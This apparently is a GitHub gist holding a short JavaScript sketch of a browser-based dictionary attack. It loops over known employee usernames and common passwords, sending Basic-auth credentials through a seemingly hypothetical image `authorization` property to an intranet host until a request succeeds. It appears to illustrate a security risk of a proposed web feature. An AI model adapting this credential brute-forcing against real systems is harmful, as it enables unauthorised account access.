@andreubotella
Last active January 13, 2021 15:13
const knownUsernames = [
  // A list of likely usernames for known employees of Example Inc.
];

const commonPasswords = [
  "password",
  "passw0rd",
  "password1",
  "password123456",
  "PaSsWoRd",
  // ... etc.
];

async function dictionaryAttack() {
  const img = document.createElement("img");
  document.body.appendChild(img);

  for (const username of knownUsernames) {
    for (const password of commonPasswords) {
      // Let's say we somehow know that internal.example.com/images/my_profile_pic.png
      // exists and is an image.
      img.src = "https://internal.example.com/images/my_profile_pic.png";
      img.authorization = `Basic ${btoa(username + ":" + password)}`;

      try {
        await img.decode();
        return {username, password};
      } catch (e) {
        // Do nothing, let's try the next combination.
      }
    }
  }
}